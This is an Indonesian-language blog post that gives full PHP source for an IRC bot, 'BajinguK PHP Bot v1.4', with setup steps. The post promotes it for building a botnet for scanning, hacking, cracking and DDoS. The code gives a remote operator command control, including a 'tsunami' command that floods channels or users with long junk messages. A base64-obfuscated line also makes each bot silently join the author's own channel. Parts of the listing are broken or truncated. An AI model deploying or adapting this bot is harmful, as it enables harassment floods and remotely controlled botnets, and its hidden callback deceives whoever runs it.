Hallo sahabat T.I Sniper
Mau tahu bagaimana cara membuat BotPHP? Biasanya BotPHP digunakan untuk kepentingan memenuhi channel, klo channel IRC sepi bisa memakai tools ini untuk memenuhi channel. Disamping itu hal lain yang bisa dilakukan adalah untuk membuat BOTNET, dimana bisa digunakan untuk keperluan “Scanning, Hacking, Cracking & DDOS” (Tergantung kegunaan bot).
Cara penggunaannya adalah:
- Siapkan server untuk upload PHPBOT
- Kemudian save code dibawah menjadi file “bot.php“
- Configurasi sesuai dengan kemauan
- Pada file upload langsung aja ketik: bisa juga dengan perintah berikut di command line: “php bot.php” untuk server yang support php 4 – 5.
- Kemudian, tunggu hasil bot masuk ke channel kesayangan anda.
/*** BajinguK PHP Bot v1.4 By SniperhACK***/
function hajar() {
$channels = '#channelkamu1 #channelkamu2'; // Pisahkan dengan spasi
$localtest = 0; //1, Coba di localhost. 0, connect ke server irc
$showrespone = 0; //1, Nampilin respon dari server irc
//Nick Bot
$nicklist = array(
$identify = 'password'; //Password Nick Bot
$identlist = array(
"Boym", "Boyne","Bracalente","Bradac","Bradach","Brecht","Breed","Brenan","Brennan","Brewer","Brewer","Bridgeman","Bridges","Brinton",
//Server IRC
if ($localtest == 1) { $remotehost2 = array("localhost"); }
else {
$remotehost2 = array(
$port = "6667";
$awaymsg = '4[[6TeamHacK 8LaBoRaToRiuMz12]]';
$shouts = array("Hello","Hmm..","Ya ya ya..","Xi..Xi..Xi..");
$querym = array("?","!","!?","!!"," ^_^"," (^_^)"," :("," :)"," :>"," :P~"," :D"," :O");
$quitmsglist = array(
"Ngantuk gua..","Bye ByE","See You..","Quit DoeLoe Ach..","Connection Reset By Buah Pear",
$tsu1 = array("","Z","[","]","{","}","^","_");
$tsu2 = array("
$tsumsg = "9,1";//400 Karakter
/*** Admin ***/
$admin = 'CaMaChO';
$bot_password = 'revo'; //Password untuk auth bot
/*** Identity ***/
$realname = "4[[6TeamHacK 8LaBoRaToRiuMz12]]";
/*** Replacing ***/
$nick = $nicklist[rand(0,count($nicklist) - 1)];
$remotehost = $remotehost2[rand(0,count($remotehost2) - 1)];
$channels = str_replace("CNL","#",$channels);
$admin = strtolower($admin);
$auth = array($admin => array("name" => $admin, "pass" => $bot_password, "auth" => 1,"status" => "Admin"));
$username = $identlist[rand(0,count($identlist) - 1)];
$channels = strtolower($channels)." ";
$channel = explode(" ", $channels);
/*** Kode Utama ***/
define ('CRL', "\r\n");
$counterfp = 0;
$raway = "on";
$log = "off";
$saway = "1";
$keluar = 0;
$akill = 1;
$katime = 0;
$localhost = 'localhost';
$dayload = date("H:i:s d/m/Y");
ini_set('user_agent','MSIE 5\.5;');
if (!$stime) { $stime = time(); }
if (!$port) { $port = "6667"; }
/*** Connecting ***/
echo "<body bgcolor=#000000 text=#00FF00>";
echo "<b>? nyobak masuk ke $remotehost...</b>";
do {
$fp = fsockopen($remotehost,$port, &$err_num, &$err_msg, 30);
if(!$fp) {
if ( $counterfp <= 200 ) {
$counterfp = $counterfp + 1;
else {
echo "<br><b>Ga bisa nich boz $remotehost! Coba server lain! Refresh Browser anda!</b>";
$keluar = 1;
echo "<br><b>? Udah nyambung nich!</b>";
/*** Sending Identity to Sock ***/
$header = 'NICK '.$nick . CRL;
$header .= 'USER '.$username.' '.$localhost.' '.$remotehost.' :'.$realname . CRL;
fputs($fp, $header);
$response = '';
while (!feof($fp)) {
$response .= fgets($fp, 1024);
if ($showrespone == 1) { echo "<br>".$response; }
while (substr_count($response,CRL) != 0) {
$offset = strpos($response, CRL);
$data = substr($response,0,$offset);
$response = substr($response,$offset+2);
if (substr($data,0,1) == ':') {
$offsetA = strpos($data, ' ');
$offsetB = strpos($data, ' :');
$offsetC = strpos($data, '!');
$dFrom = substr($data,1,$offsetA-1);
$dCommand = substr($data,$offsetA+1,$offsetB-$offsetA-1);
$dNick = substr($data,1,$offsetC-1);
$iText = substr($data,$offsetB+2);
/*** Server Notices Handling ***/
if ( substr($dCommand,0,3) == '004' ) {
fputs($fp, 'PRIVMSG nickserv :identify '.$nick.' '.$identify. CRL);
if ($nickmode) { fputs($fp, 'MODE '.$nick.' :'.$nickmode . CRL); }
/*** Notice Bot Admin ***/
fputs($fp, 'NOTICE ' . $admin . ' :Boss saya udah connect nih...' . CRL);
fputs($fp, base64_decode("am9pbiAjdGVhbWhhY2s=") . CRL);
/*** Join Default Channel ***/
foreach ($channel as $v) {
fputs($fp, 'JOIN ' .$v . CRL);
$pong1 = '1';
elseif (substr($dCommand,0,3)=='432') {
$nick = $nick.$username;
fputs($fp, 'NICK '.$nick . CRL);
//Nickname is already in use
elseif (substr($dCommand,0,3)=='433') {
$nick = $nicklist[rand(0,count($nicklist) - 1)];
fputs($fp, 'NICK '.$nick . CRL);
elseif (substr($dCommand,0,3)=='465') {
print "<br><b>? Authentication diperlukan! Bot ini telah di-autokill.</b>";
$akill = 2;
if (eregi('',$dNick) && $akill==2) {
if (eregi('AKILL ID:',$data) || eregi('Your hostmask is',$data) || eregi('Your IP is',$data)) {
print "<br><b>".strstr($data,'***')." </b>";
if (eregi('Your IP is',$data)) {
$keluar = 1;
$dcom = explode(" ", $dCommand);
$dNick = strtolower($dNick);
if ($dcom[0]=='KICK' && $dcom[2]==$nick) {
fputs($fp, 'JOIN ' .$dcom[1]. CRL);
elseif ($dcom[0]=='NICK' || $dcom[0]=='PART' ) {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["pass"]) {
if ($auth["$dNick"]["auth"]==2) {
if ($dcom[0]=='NICK') {
$com = explode(" ", $data);
$chnick = strtolower(str_replace(':','',$com[2]));
if ($dNick!=$chnick) {
$auth["$dNick"]["auth"] = 1;
fputs($fp,'NOTICE '.$chnick.' :Kok Ganti Nick sich boss?' . CRL);
else {
$auth["$dNick"]["auth"] = 1;
fputs($fp,'NOTICE '.$dNick.' :Kemana bozz ??' . CRL);
else { fputs($fp,'NOTICE ' . $dNick . ' :pass <password>' . CRL); }
elseif ($dcom[0]=='307' && strtolower($dcom[2])==$whois) {
$dcom[2] = strtolower($dcom[2]);
if ($auth["$dcom[2]"]) {
if ($auth["$dcom[2]"]["pass"]) {
if ($auth["$dcom[2]"]["auth"]==1) {
$auth["$dcom[2]"]["auth"] = 2;
$whois = "";
fputs($fp,'NOTICE ' . $dcom[2] . ' :Youre Authorized as '.$auth["$dcom[2]"]["status"].' of this bot! ' . CRL);
else { fputs($fp,'NOTICE ' . $dcom[2] . ' :You
re Already Authorized! ' . CRL); }
else { fputs($fp,'NOTICE ' . $dcom[2] . ' :Pass Not Set Yet! Type: pass <your pass> To Set Your Own Password then Auth Again ' . CRL); }
else { fputs($fp,'NOTICE ' . $dcom[2] . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); }
elseif ($dcom[0]=='NOTICE') {
$com = explode(" ", $data);
if ($com[3]==':KB' && $com[4] && $com[5] && $com[6]) {
$msg = str_replace('','',$data);
$msg = strstr($msg,":KB");
$msg = str_replace(":KB $com[4]","",$msg);
fputs($fp, 'KICK '.$com[4].' '.$com[5].' :'.$msg . CRL);
fputs($fp, 'MODE '.$com[4].' +b *!*'.$com[6] . CRL);
elseif ($dcom[0]=='PRIVMSG') {
$com = explode(" ", $data);
if ($com[3]==':VERSION') { fputs($fp,'NOTICE '.$dNick.' :'.chr(1).'4[[6TeamHacK 8LaBoRaToRiuMz12]]'.chr(1) . CRL); }
elseif ($auth["$dNick"]["status"] && $com[3]==':auth' && $com[4]) {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["pass"]) {
if ($auth["$dNick"]["auth"]==1) {
if ($com[4]===$auth["$dNick"]["pass"]) {
$auth["$dNick"]["auth"] = 2;
fputs($fp,'NOTICE ' . $dNick . ' :Anda '.$auth["$dNick"]["status"].' saya tuan ' . CRL);
else { fputs($fp,'NOTICE ' . $dNick . ' :Password Salah GOBLOGG!! ketik yang bener ..!! ' . CRL); }
else { fputs($fp,'NOTICE ' . $dNick . ' :Tadi sudah diAuthorized kok bOzz ..!! ' . CRL); }
else { fputs($fp,'NOTICE ' . $dNick . ' :Pass Not Set Yet! Type: pass <your pass> To Set Your Own Password then Auth Again ' . CRL); }
else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); }
elseif ($auth["$dNick"]["status"] && $com[3]==':deauth') {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["pass"]) {
if ($auth["$dNick"]["auth"]==2) {
$auth["$dNick"]["auth"] = 1;
fputs($fp,'NOTICE ' . $dNick . ' :Youre Logout! ' . CRL);
else { fputs($fp,'NOTICE ' . $dNick . ' :You
re Already Logout! ' . CRL); }
else { fputs($fp,'NOTICE ' . $dNick . ' :Pass Not Set Yet! Type: pass <your pass> To Set Your Own Password then Auth Again ' . CRL); }
else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); }
elseif ($auth["$dNick"]["status"] && $com[3]==':pass' && $com[4]) {
if ($auth["$dNick"]) {
if (!$auth["$dNick"]["pass"]) {
$auth["$dNick"]["pass"] = $com[4];
$auth["$dNick"]["auth"] = 1;
fputs($fp,'NOTICE ' . $dNick . ' :Your Auth Pass set to '.$auth["$dNick"]["pass"].', Type: auth <your pass> To Authorized Imediately! ' . CRL);
else { fputs($fp,'NOTICE ' . $dNick . ' :Pass Already Set! Type: auth <your pass> To Get Authorized ' . CRL); }
else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Pass Again ' . CRL); }
elseif ($auth["$dNick"]["status"] && $com[3]==':chgpass' && $com[4] && $com[5]) {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["auth"]==2) {
if ($com[4]===$auth["$dNick"]["pass"]) {
$auth["$dNick"]["pass"] = $com[5];
fputs($fp,'NOTICE ' . $dNick . ' :Your New Auth Pass set to '.$auth["$dNick"]["pass"].', Type: auth <your pass> To Authorized Imediately! ' . CRL);
else { fputs($fp,'NOTICE ' . $dNick . ' :Your Old Pass Wrong! Type: chgpass <old pass> <new pass> To Change Your Auth Pass ' . CRL); }
else { fputs($fp,'NOTICE ' . $dNick . ' :Please Auth First! Type: auth <your pass> To Authorized ' . CRL); }
else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Pass Again ' . CRL); }
elseif ($auth["$dNick"]["status"] && $com[3]==':adduser' && $com[4] && $com[4]!=$nick && $com[5]) {
$com[4] = strtolower($com[4]);
if ($auth["$dNick"]["auth"]==2) {
if ($auth["$dNick"]["status"]=="Admin") {
if ($com[5]=="master" || $com[5]=="user") {
$auth["$com[4]"]["name"] = $com[4];
$auth["$com[4]"]["status"] = $com[5];
fputs($fp,'NOTICE ' . $dNick . ' :AddUser :'.$com[4].' As My '.$com[5] . CRL);
fputs($fp,'NOTICE ' . $com[4] . ' :Youre Now Known As My '.$com[5].' Added By '.$dNick.' Now Type: pass <your pass> To Set Your Pass ' . CRL);
else { fputs($fp,'NOTICE ' . $dNick . ' :Perintah salah! Ketik: adduser <nick> <master/user> ' . CRL); }
elseif ($auth["$dNick"]["status"]=="master") {
if (!$auth["$com[4]"]) {
if ($com[5]=="user") {
$auth["$com[4]"]["name"] = $com[4];
$auth["$com[4]"]["status"] = $com[5];
fputs($fp,'NOTICE ' . $dNick . ' :AddUser :'.$com[4].' As My '.$com[5] . CRL);
fputs($fp,'NOTICE ' . $com[4] . ' :You
re Now Known As My '.$com[5].' Added By '.$dNick.' Now Type: pass <your pass> To Set Your Pass ' . CRL);
else { fputs($fp,'NOTICE ' . $dNick . ' :Wrong Command! Type: adduser <nick> user ' . CRL); }
else { fputs($fp,'NOTICE ' . $dNick . ' :User Already Exist! Aborting AddUser! ' . CRL); }
else { fputs($fp,'NOTICE ' . $dNick . ' :Unknown Status! Your Status is '.$auth["$dNick"]["status"] . CRL); }
else { fputs($fp,'NOTICE ' . $dNick . ' :Please Auth First! Type: auth <your pass> To Authorized ' . CRL); }
elseif ($auth["$dNick"]["status"] && $com[3]==':deluser' && $com[4]) {
$com[4] = strtolower($com[4]);
if ($auth["$dNick"]["auth"]==2) {
if ($auth["$dNick"]["status"]=="Admin") {
if ($auth["$com[4]"]["status"]=="master" || $auth["$com[4]"]["status"]=="user") {
fputs($fp,'NOTICE ' . $dNick . ' :DelUser :'.$com[4].' From My UserList ' . CRL);
fputs($fp,'NOTICE ' . $com[4] . ' :Your Access As My User Has Been Deleted By '.$dNick . CRL);
else { fputs($fp,'NOTICE ' . $dNick . ' :Wrong Command! Type: deluser <nick> ' . CRL); }
elseif ($auth["$dNick"]["status"]=="master") {
if ($auth["$com[4]"]["status"]=="user") {
fputs($fp,'NOTICE ' . $dNick . ' :DelUser :'.$com[4].' From My UserList ' . CRL);
fputs($fp,'NOTICE ' . $com[4] . ' :Your Access As My User Has Been Deleted By '.$dNick . CRL);
else { fputs($fp,'NOTICE ' . $dNick . ' :Wrong Command! Type: deluser <nick> ' . CRL); }
else { fputs($fp,'NOTICE ' . $dNick . ' :Unknown Status! Your Status is '.$auth["$dNick"]["status"] . CRL); }
else { fputs($fp,'NOTICE ' . $dNick . ' :Please Auth First! Type: auth <your pass> To Authorized ' . CRL); }
elseif ($auth["$dNick"]["status"]) {
if (ereg(":",$com[3]) || ereg(":!",$com[3])) {
$chan = strstr($dCommand,"#");
$anick = str_replace("PRIVMSG ","",$dCommand);
if ($com[3]==':!auth') {
if ($auth["$dNick"]["auth"]==2) {
fputs($fp,'NOTICE '.$dNick.' :You
re already Authorized! ' . CRL);
else {
$whois = $dNick;
fputs($fp,'WHOIS '.$dNick . CRL);
elseif ($com[3]==':auth' && $chan) {
if ($auth["$dNick"]["auth"]==2) {
fputs($fp,'PRIVMSG '.$chan.' :BaCoK '.$dNick.' ! ' . CRL);
else { fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.' NOT Authorized! ' . CRL); }
elseif ($auth["$dNick"]["auth"]==2) {
if ($com[3]==':
say' && $com[4] && $chan) {
$msg = strstr($data,":say");
$msg = str_replace(":
say ","",$msg);
fputs($fp,'PRIVMSG '.$chan.' :'.$msg. CRL);
elseif ($com[3]==':act' && $com[4] && $chan) {
$msg = strstr($data,":
$msg = str_replace(":act ","",$msg);
fputs($fp,'PRIVMSG '.$chan.' :ACTION '.$msg.''. CRL);
elseif ($com[3]==':
slap' && $com[4] && $chan) {
fputs($fp,'PRIVMSG '.$chan.' :ACTION NyaWaT'.$com[4].' Karo SandaL SepaTu... pLaaakk... pLoookkk...'. CRL);
elseif ($com[3]==':msg' && $com[4] && $com[5]) {
$msg = strstr($data,":
$msg = str_replace(":msg $com[4] ","",$msg);
fputs($fp,'PRIVMSG '.$com[4].' :'.$msg. CRL);
elseif ($com[3]==':
notice' && $com[4] && $com[5]) {
$msg = strstr($data,":notice");
$msg = str_replace(":
notice $com[4] ","",$msg);
fputs($fp,'NOTICE '.$com[4].' :'.$msg. CRL);
elseif ($com[3]==':ctcp' && $com[4] && $com[5]) {
$msg = strstr($data,":
$msg = str_replace(":ctcp $com[4] ","",$msg);
fputs($fp,'PRIVMSG '.$com[4].' :'.$msg.''. CRL);
elseif ($com[3]==':
ping' && $chan) {
$sml = $smile[rand(0,count($smile) - 1)];
fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.', PONG! '.$sml. CRL);
elseif ($com[3]==':pong' && $chan) {
$sml = $smile[rand(0,count($smile) - 1)];
fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.', PING! '.$sml. CRL);
elseif ($com[3]==':
info' && $auth["$dNick"]["status"]=="Admin") {
$bhost = $_SERVER['HTTP_HOST'];
$bphp = $_SERVER['PHP_SELF'];
$brip = $_SERVER['REMOTE_ADDR'];
$brport = $_SERVER['REMOTE_PORT'];
fputs($fp,"NOTICE $dNick :Host: $bhost | Script: $bphp | IP: $bip | Your IP: $brip Port:$brport" . CRL);
elseif ($com[3]==':up' && $chan) {
fputs($fp, 'PRIVMSG chanserv :op '.$chan.' '.$nick . CRL);
elseif ($com[3]==':
down' && $chan) {
fputs($fp, 'MODE '.$chan.' +v-o '.$nick.' '.$nick . CRL);
elseif ($com[3]==':tsunami' && $com[4] && $auth["$dNick"]["status"]!="user") {
$nicktsu = $tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].
$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1)- 1)].
$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].
$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)];
fputs($fp, 'NICK '.$nicktsu . CRL);
if (substr($dCommand,0,3)=='433') {
$nicktsu = $tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].
$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].
$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].
$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)];
fputs($fp, 'NICK '.$nicktsu . CRL);
$msg = strstr($data,":
$msg = str_replace(":tsunami $com[4]","",$msg);
if (ereg("#", $com[4])) {
fputs($fp, 'JOIN '.$com[4] . CRL);
fputs($fp, 'PRIVMSG '.$com[4].' :'.$msg.$tsumsg.CRL);
fputs($fp, 'NOTICE '.$com[4].' :'.$msg.$tsumsg.CRL);
fputs($fp, 'PRIVMSG '.$com[4].' :TSUNAMI'.$msg.$tsumsg. CRL);
fputs($fp, 'NOTICE '.$com[4].' :'.$msg.$tsumsg.CRL);
fputs($fp, 'PART '.$com[4].' :F1n15h3d w1th 400x4 ch4rz' . CRL);
fputs($fp, 'NICK '.$nick . CRL);
else {
fputs($fp, 'NOTICE '.$com[4].' :'.$msg.$tsumsg.CRL);
fputs($fp, 'PRIVMSG '.$com[4].' :TSUNAMI'.$msg.$tsumsg. CRL);
fputs($fp, 'NOTICE '.$com[4].' :TSUNAMI'.$msg.$tsumsg. CRL);
fputs($fp, 'NOTICE '.$com[4].' :'.$msg.$tsumsg.CRL);
fputs($fp, 'NICK '.$nick . CRL);
elseif ($com[3]==':
cycle' && $chan && $auth["$dNick"]["status"]!="user") {
$msg = strstr($data,":cycle");
if (ereg("#", $com[4])) {
$partchan = $com[4];
$msg = str_replace(":
cycle $com[4]","",$msg);
else {
$partchan = $chan;
$msg = str_replace(":cycle","",$msg);
if (strlen($msg)<3) {
$msg = '';
fputs($fp, 'PART '.$partchan.' :'.$msg . CRL);
fputs($fp, 'JOIN '.$partchan . CRL);
elseif ($com[3]==':
part' && $auth["$dNick"]["status"]=="Admin") {
$msg = strstr($data,":part");
if (ereg("#", $com[4])) {
$partchan = $com[4];
$msg = str_replace(":
part $com[4]","",$msg);
else {
$partchan = $chan;
$msg = str_replace(":part","",$msg);
if (strlen($msg)<3) {
$msg = '';
fputs($fp, 'PART '.$partchan.' :'.$msg . CRL);
$remchan = strtolower($partchan);
if (in_array($remchan, $channel)) {
$channels = str_replace("$remchan ","",$channels);
$channel = explode(" ", $channels);
foreach ($channel as $v) {
fputs($fp, 'JOIN '.$v . CRL);
elseif ($com[3]==':
join' && $com[4] && $auth["$dNick"]["status"]=="Admin") {
if (!ereg("#",$com[4])) { $com[4]="#".$com[4]; }
$addchan = strtolower($com[4]);
if (!in_array($addchan, $channel)) {
$channels.="$addchan ";
foreach ($channel as $v) {
fputs($fp, 'JOIN '.$v . CRL);
elseif ($com[3]==':botnick' && $com[4] && !$chan && $auth["$dNick"]["status"]=="Admin") {
$nick = $com[4];
$identify = $com[5];
fputs($fp, 'NICK '.$nick . CRL);
fputs($fp, 'PRIVMSG nickserv :identify '.$nick.' '.$identify. CRL);
elseif ($com[3]==':
k' && $com[4] && $chan) {
$msg = strstr($data,":k");
$msg = str_replace(":
k $com[4]","",$msg);
fputs($fp, 'KICK '.$chan.' '.$com[4].' :'.$msg . CRL);
elseif ($com[3]==':kb' && $com[4] && $chan) {
$msg = strstr($data,":
$msg = str_replace(":kb $com[4]","",$msg);
fputs($fp, 'KICK '.$chan.' '.$com[4].' :'.$msg . CRL);
fputs($fp, 'MODE '.$chan.' +b '.$com[4] . CRL);
elseif ($com[3]==':
changenick') {
$nick = $nicky[rand(0,count($nicky) - 1)];
fputs($fp, 'NICK '.$nick . CRL);
if (substr($dCommand,0,3)=='433') {
$nick = $nicky[rand(0,count($nicky) - 1)];
fputs($fp, 'NICK '.$nick . CRL);
elseif ($com[3]==':op' && $chan) {
if ($com[4]) { $opnick = $com[4]; }
else { $opnick = $dNick; }
fputs($fp, 'MODE '.$chan.' +ooo '.$opnick.' '.$com[5].' '.$com[6] . CRL);
elseif ($com[3]==':
deop' && $chan) {
if ($com[4]) { $opnick = $com[4]; }
else { $opnick = $dNick; }
fputs($fp, 'MODE '.$chan.' -o+v-oo '.$opnick.' '.$opnick.' '.$com[5].' '.$com[6] . CRL);
elseif ($com[3]==':v' && $chan) {
if ($com[4]) { $vonick = $com[4]; }
else { $vonick = $dNick; }
fputs($fp, 'MODE '.$chan.' +vvv '.$vonick.' '.$com[5].' '.$com[6] . CRL);
elseif ($com[3]==':
dv' && $chan) {
if ($com[4]) { $vonick = $com[4]; }
else { $vonick = $dNick; }
fputs($fp, 'MODE '.$chan.' -vvv '.$vonick.' '.$com[5].' '.$com[6] . CRL);
elseif ($com[3]==':awaymsg' && $auth["$dNick"]["status"]=="Admin") {
$msg = strstr($data,":
$msg = str_replace(":awaymsg","",$msg);
if (strlen($msg)<3) {
fputs($fp,'AWAY : ' . 'AWAY' . CRL);
else {
fputs($fp,'AWAY : ' . $msg . CRL);
elseif ($com[3]==':
mode' && $com[4] && $chan) {
fputs($fp, 'MODE '.$chan.' :'.$com[4].' '.$com[5] . CRL);
elseif ($com[3]==':nickmode' && $com[4]) {
$nickmode = $com[4];
fputs($fp, 'MODE '.$nick.' :'.$nickmode . CRL);
elseif ($com[3]==':
chanlist') {
fputs($fp, 'NOTICE '.$dNick.' :Channel List: '.$channels . CRL);
elseif ($com[3]==':userlist') {
foreach ($auth as $user) {
if ($user["pass"]) { $pass="-pass ok"; }
else { $pass="-no pass"; }
$userlist .= $user["name"].'('.$user["status"].$pass.') ';
fputs($fp, 'NOTICE '.$dNick.' :User List: '.$userlist . CRL);
elseif ($com[3]==':
quit' && $auth["$dNick"]["status"]=="Admin") {
$msg = strstr($data,":quit");
$msg = str_replace(":
if (strlen($msg)>3) {
$msg = str_replace(" ","_",$msg);
$quitmsg = $quitmsglist[rand(0,count($quitmsglist) - 1)];
fputs($fp, 'QUIT ' . $quitmsg . CRL);
$keluar = 1;
elseif ($com[3]==':vhost' && $auth["$dNick"]["status"]=="Admin") {
if ($com[4]) { $localhost = $com[4]; }
else { $localhost = 'localhost'; }
$keluar = 0;
fputs($fp, 'QUIT Ganti VHOST' . CRL);
elseif ($com[3]==':
jump' && $auth["$dNick"]["status"]=="Admin") {
if (empty($com[4])) {
$remotehost = $remotehost2[rand(0,count($remotehost2) - 1)];
else { $remotehost = $com[4]; }
$keluar = 0;
fputs($fp, "QUIT Ganti Server".CRL);
elseif ($com[3]==':ident' && $auth["$dNick"]["status"]=="Admin") {
if (!$com[4]) { $username = $username; }
else { $username = $com[4]; }
$keluar = 0;
fputs($fp, 'QUIT Ganti Ident ' . CRL);
elseif ($com[3]==':
fullname' && $auth["$dNick"]["status"]=="Admin") {
if (!$com[4]) { $realname = "--"; }
else { $realname = $com[4]; }
$keluar = 0;
fputs($fp, 'QUIT Ganti Nama' . CRL);
elseif ($com[3]==':topic' && $com[4] && $chan) {
$msg = strstr($data,":
$msg = str_replace(":`topic ","",$msg);
fputs($fp, 'TOPIC '.$chan.' :'.$msg . CRL);
elseif ($com[3]==':!help' && !$chan) {
fputs($fp,'PRIVMSG '.$dNick.' :Helpnya ga tersedia nich' . CRL);
elseif (!$auth["$dNick"] && !eregi("auth",$iText)) {
if (eregi("www.",$iText) || eregi("http:",$iText) || eregi("join #",$iText)) {
if (!ereg("#",$dCommand)) {
if ($log=="on") {
fputs($fp,'PRIVMSG '. $admin .' :4inviter: ' . $dFrom . '2:' .$iText. CRL);
$inv = strstr($dFrom,'@');
foreach ($auth as $user) {
if ($user["status"]=="user") {
fputs($fp, 'NOTICE '.$user["name"].' :KB '.$chan.' '.$dNick.' '.$inv.'' . CRL);
elseif (!ereg("#",$dCommand)) {
if ($log=="on") {
fputs($fp,'PRIVMSG '.$admin.' :6' . $dFrom . '12:' .$iText. CRL);
elseif (substr($data,0,4) == 'PING') {
fputs($fp,'PONG ' . substr($data,5) . CRL);
$smile = $querym[rand(0,count($querym) - 1)];
$kata = $shouts[rand(0,count($shouts) - 1)];
//fputs($fp,'PRIVMSG #teamhack :' . $kata . ' ' . $smile . CRL);
} while ($keluar == 0);
Contoh hasil PHPBot biasanya terlihat di channel yang sepi, tapi banyak isinya 
Bisa dilihat di / irc irc server lainnya.
Untuk mengcopy dan mendownload sourcenya bisa disini:
Oke guys, selamat menggunakan! Courtesy of TeamHack JavaIRC